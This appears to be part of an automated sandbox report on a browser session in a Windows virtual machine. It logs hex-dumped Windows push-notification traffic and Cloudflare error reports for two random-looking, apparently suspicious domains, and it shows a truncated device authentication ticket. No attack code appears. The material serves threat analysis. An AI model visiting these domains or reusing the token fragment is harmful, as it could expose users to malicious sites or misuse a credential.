                                                              2024-07-03 07:41:20 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                              2024-07-03 07:41:20 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 41 58 6e 6f 4e 66 66 48 63 55 71 45 2b 47 77 70 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 33 63 37 65 63 39 36 36 66 64 35 63 39 31 63 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 62 4a 4d 76 4b 6e 47 2b 5a 70 34 4c 4a 68 46 44 56 76 62 51 4f 48 4f 69 49 4a 65 2b 75 54 4e 65 73 61 45 57 63 67 75 44 5a 51 4c 59 45 6e 41 32 46 79 38 66 77 45 46 76 62 2f 4d 51 31 71 63 6a 6a 64 57 6f 67 34 2b 73 30 63 35 69 2b 6c 49 6d 72 37 6e 46 30 48 33 58 63 62 44 4b 52 74 7a 6b 67 50 46 64 63 67 57 55 54 4a 36 57 33
                                                              Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: AXnoNffHcUqE+Gwp.2Context: a3c7ec966fd5c91c<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAbJMvKnG+Zp4LJhFDVvbQOHOiIJe+uTNesaEWcguDZQLYEnA2Fy8fwEFvb/MQ1qcjjdWog4+s0c5i+lImr7nF0H3XcbDKRtzkgPFdcgWUTJ6W3
                                                              2024-07-03 07:41:20 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 41 58 6e 6f 4e 66 66 48 63 55 71 45 2b 47 77 70 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 33 63 37 65 63 39 36 36 66 64 35 63 39 31 63 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: AXnoNffHcUqE+Gwp.3Context: a3c7ec966fd5c91c<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                              2024-07-03 07:41:20 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                              Data Ascii: 202 1 CON 58
                                                              2024-07-03 07:41:20 UTC58INData Raw: 4d 53 2d 43 56 3a 20 50 68 62 45 39 6c 42 78 6d 30 61 71 51 38 32 64 65 4f 4f 62 64 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                              Data Ascii: MS-CV: PhbE9lBxm0aqQ82deOObdA.0Payload parsing failed.


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              95192.168.2.66298040.113.103.199443
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:29 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4b 52 2b 50 69 54 4b 66 69 6b 57 78 6a 51 54 78 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 33 63 36 66 39 34 65 32 65 65 37 34 32 30 31 0d 0a 0d 0a
                                                              Data Ascii: CNT 1 CON 305MS-CV: KR+PiTKfikWxjQTx.1Context: 23c6f94e2ee74201
                                                              2024-07-03 07:41:29 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                              2024-07-03 07:41:29 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 4b 52 2b 50 69 54 4b 66 69 6b 57 78 6a 51 54 78 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 33 63 36 66 39 34 65 32 65 65 37 34 32 30 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 62 4a 4d 76 4b 6e 47 2b 5a 70 34 4c 4a 68 46 44 56 76 62 51 4f 48 4f 69 49 4a 65 2b 75 54 4e 65 73 61 45 57 63 67 75 44 5a 51 4c 59 45 6e 41 32 46 79 38 66 77 45 46 76 62 2f 4d 51 31 71 63 6a 6a 64 57 6f 67 34 2b 73 30 63 35 69 2b 6c 49 6d 72 37 6e 46 30 48 33 58 63 62 44 4b 52 74 7a 6b 67 50 46 64 63 67 57 55 54 4a 36 57 33
                                                              Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: KR+PiTKfikWxjQTx.2Context: 23c6f94e2ee74201<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAbJMvKnG+Zp4LJhFDVvbQOHOiIJe+uTNesaEWcguDZQLYEnA2Fy8fwEFvb/MQ1qcjjdWog4+s0c5i+lImr7nF0H3XcbDKRtzkgPFdcgWUTJ6W3
                                                              2024-07-03 07:41:29 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 4b 52 2b 50 69 54 4b 66 69 6b 57 78 6a 51 54 78 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 33 63 36 66 39 34 65 32 65 65 37 34 32 30 31 0d 0a 0d 0a
                                                              Data Ascii: BND 3 CON\QOS 56MS-CV: KR+PiTKfikWxjQTx.3Context: 23c6f94e2ee74201
                                                              2024-07-03 07:41:30 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                              Data Ascii: 202 1 CON 58
                                                              2024-07-03 07:41:30 UTC58INData Raw: 4d 53 2d 43 56 3a 20 6a 55 49 62 38 48 77 4d 38 45 47 33 31 67 4e 47 62 64 53 75 41 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                              Data Ascii: MS-CV: jUIb8HwM8EG31gNGbdSuAw.0Payload parsing failed.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              96192.168.2.66298335.190.80.14434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:33 UTC550OUTOPTIONS /report/v4?s=p5f604Do%2BEvEulOYwuBd%2FKN3A2hF8%2FZLsNfHkCqbNoMc3fA19tPlYJK%2B2VBDIjh93MJ2nOaHDSVdEhZGeODgv4NZd5UARcFXKsA1NW%2FTuIYY5HFztj6mYBlYH%2FCTmEeHtdMx4g%3D%3D HTTP/1.1
                                                              Host: a.nel.cloudflare.com
                                                              Connection: keep-alive
                                                              Origin: https://s3irk.ativens.com
                                                              Access-Control-Request-Method: POST
                                                              Access-Control-Request-Headers: content-type
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:41:33 UTC336INHTTP/1.1 200 OK
                                                              Content-Length: 0
                                                              access-control-max-age: 86400
                                                              access-control-allow-methods: POST, OPTIONS
                                                              access-control-allow-origin: *
                                                              access-control-allow-headers: content-length, content-type
                                                              date: Wed, 03 Jul 2024 07:41:32 GMT
                                                              Via: 1.1 google
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              97192.168.2.66298235.190.80.14434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:33 UTC540OUTOPTIONS /report/v4?s=9FyY8jlCi%2F4c38DrlGQVn%2B9cY2SnHA0qSQTJPRz%2F6kjxo3cIRyNG7O38Mbgk9DpOFhZ2EbmUVAyLtUU4H%2F83L1dONhtgfRMoHtDx%2B9CLOkABMcKzLgVVyQIFh0r8kA%3D%3D HTTP/1.1
                                                              Host: a.nel.cloudflare.com
                                                              Connection: keep-alive
                                                              Origin: https://vkwek.ckyucle.com
                                                              Access-Control-Request-Method: POST
                                                              Access-Control-Request-Headers: content-type
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:41:33 UTC336INHTTP/1.1 200 OK
                                                              Content-Length: 0
                                                              access-control-max-age: 86400
                                                              access-control-allow-methods: OPTIONS, POST
                                                              access-control-allow-origin: *
                                                              access-control-allow-headers: content-type, content-length
                                                              date: Wed, 03 Jul 2024 07:41:32 GMT
                                                              Via: 1.1 google
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              98192.168.2.66298435.190.80.14434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:33 UTC490OUTPOST /report/v4?s=p5f604Do%2BEvEulOYwuBd%2FKN3A2hF8%2FZLsNfHkCqbNoMc3fA19tPlYJK%2B2VBDIjh93MJ2nOaHDSVdEhZGeODgv4NZd5UARcFXKsA1NW%2FTuIYY5HFztj6mYBlYH%2FCTmEeHtdMx4g%3D%3D HTTP/1.1
                                                              Host: a.nel.cloudflare.com
                                                              Connection: keep-alive
                                                              Content-Length: 474
                                                              Content-Type: application/reports+json
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:41:33 UTC474OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 39 39 35 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 37 34 37 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 39 30 2e 31 36 37 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 73 33 69 72 6b 2e 61 74 69 76 65 6e
                                                              Data Ascii: [{"age":19950,"body":{"elapsed_time":747,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.21.90.167","status_code":404,"type":"http.error"},"type":"network-error","url":"https://s3irk.ativen
                                                              2024-07-03 07:41:34 UTC168INHTTP/1.1 200 OK
                                                              Content-Length: 0
                                                              date: Wed, 03 Jul 2024 07:41:33 GMT
                                                              Via: 1.1 google
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              99192.168.2.66298535.190.80.14434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:33 UTC481OUTPOST /report/v4?s=9FyY8jlCi%2F4c38DrlGQVn%2B9cY2SnHA0qSQTJPRz%2F6kjxo3cIRyNG7O38Mbgk9DpOFhZ2EbmUVAyLtUU4H%2F83L1dONhtgfRMoHtDx%2B9CLOkABMcKzLgVVyQIFh0r8kA%3D%3D HTTP/1.1
                                                              Host: a.nel.cloudflare.com
                                                              Connection: keep-alive
                                                              Content-Length: 1315
                                                              Content-Type: application/reports+json
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:41:33 UTC1315OUTData Raw: 5b 7b 22 61 67 65 22 3a 32 39 33 36 35 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 39 37 35 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 76 6b 77 65 6b 2e 63 6b 79 75 63 6c 65
                                                              Data Ascii: [{"age":29365,"body":{"elapsed_time":975,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":404,"type":"http.error"},"type":"network-error","url":"https://vkwek.ckyucle
                                                              2024-07-03 07:41:34 UTC168INHTTP/1.1 200 OK
                                                              Content-Length: 0
                                                              date: Wed, 03 Jul 2024 07:41:33 GMT
                                                              Via: 1.1 google
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              100192.168.2.66298740.113.103.199443
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:53 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 30 32 6f 6d 75 33 66 44 36 55 47 76 65 57 71 67 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 31 32 66 65 32 36 66 61 36 31 63 37 37 39 65 0d 0a 0d 0a
                                                              Data Ascii: CNT 1 CON 305MS-CV: 02omu3fD6UGveWqg.1Context: 612fe26fa61c779e
                                                              2024-07-03 07:41:53 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                              2024-07-03 07:41:53 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 30 32 6f 6d 75 33 66 44 36 55 47 76 65 57 71 67 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 31 32 66 65 32 36 66 61 36 31 63 37 37 39 65 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 62 4a 4d 76 4b 6e 47 2b 5a 70 34 4c 4a 68 46 44 56 76 62 51 4f 48 4f 69 49 4a 65 2b 75 54 4e 65 73 61 45 57 63 67 75 44 5a 51 4c 59 45 6e 41 32 46 79 38 66 77 45 46 76 62 2f 4d 51 31 71 63 6a 6a 64 57 6f 67 34 2b 73 30 63 35 69 2b 6c 49 6d 72 37 6e 46 30 48 33 58 63 62 44 4b 52 74 7a 6b 67 50 46 64 63 67 57 55 54 4a 36 57 33
                                                              Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: 02omu3fD6UGveWqg.2Context: 612fe26fa61c779e<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAbJMvKnG+Zp4LJhFDVvbQOHOiIJe+uTNesaEWcguDZQLYEnA2Fy8fwEFvb/MQ1qcjjdWog4+s0c5i+lImr7nF0H3XcbDKRtzkgPFdcgWUTJ6W3
                                                              2024-07-03 07:41:53 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 30 32 6f 6d 75 33 66 44 36 55 47 76 65 57 71 67 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 31 32 66 65 32 36 66 61 36 31 63 37 37 39 65 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: 02omu3fD6UGveWqg.3Context: 612fe26fa61c779e<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                              2024-07-03 07:41:53 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                              Data Ascii: 202 1 CON 58
                                                              2024-07-03 07:41:53 UTC58INData Raw: 4d 53 2d 43 56 3a 20 32 48 51 45 43 36 68 6c 63 6b 43 70 4c 2b 36 6b 69 4b 78 4f 42 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                              Data Ascii: MS-CV: 2HQEC6hlckCpL+6kiKxOBw.0Payload parsing failed.


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              101192.168.2.66100740.113.103.199443
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:56 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 73 44 39 4a 4c 57 30 36 32 45 75 30 70 4d 4a 46 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 66 31 65 62 30 37 31 33 65 61 37 61 35 37 31 0d 0a 0d 0a
                                                              Data Ascii: CNT 1 CON 305MS-CV: sD9JLW062Eu0pMJF.1Context: 5f1eb0713ea7a571
                                                              2024-07-03 07:41:56 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                              2024-07-03 07:41:56 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 73 44 39 4a 4c 57 30 36 32 45 75 30 70 4d 4a 46 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 66 31 65 62 30 37 31 33 65 61 37 61 35 37 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 62 4a 4d 76 4b 6e 47 2b 5a 70 34 4c 4a 68 46 44 56 76 62 51 4f 48 4f 69 49 4a 65 2b 75 54 4e 65 73 61 45 57 63 67 75 44 5a 51 4c 59 45 6e 41 32 46 79 38 66 77 45 46 76 62 2f 4d 51 31 71 63 6a 6a 64 57 6f 67 34 2b 73 30 63 35 69 2b 6c 49 6d 72 37 6e 46 30 48 33 58 63 62 44 4b 52 74 7a 6b 67 50 46 64 63 67 57 55 54 4a 36 57 33
                                                              Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: sD9JLW062Eu0pMJF.2Context: 5f1eb0713ea7a571<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAbJMvKnG+Zp4LJhFDVvbQOHOiIJe+uTNesaEWcguDZQLYEnA2Fy8fwEFvb/MQ1qcjjdWog4+s0c5i+lImr7nF0H3XcbDKRtzkgPFdcgWUTJ6W3
                                                              2024-07-03 07:41:56 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 73 44 39 4a 4c 57 30 36 32 45 75 30 70 4d 4a 46 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 66 31 65 62 30 37 31 33 65 61 37 61 35 37 31 0d 0a 0d 0a
                                                              Data Ascii: BND 3 CON\QOS 56MS-CV: sD9JLW062Eu0pMJF.3Context: 5f1eb0713ea7a571
                                                              2024-07-03 07:41:57 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                              Data Ascii: 202 1 CON 58
                                                              2024-07-03 07:41:57 UTC58INData Raw: 4d 53 2d 43 56 3a 20 44 6e 33 32 4f 73 6d 31 41 6b 36 42 67 63 44 4f 66 46 4b 39 65 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                              Data Ascii: MS-CV: Dn32Osm1Ak6BgcDOfFK9ew.0Payload parsing failed.


                                                              Click to jump to process

                                                              Click to jump to process

                                                              Click to jump to process

                                                              Target ID:0
                                                              Start time:03:40:20
                                                              Start date:03/07/2024
                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                              Imagebase:0x7ff684c40000
                                                              File size:3'242'272 bytes
                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
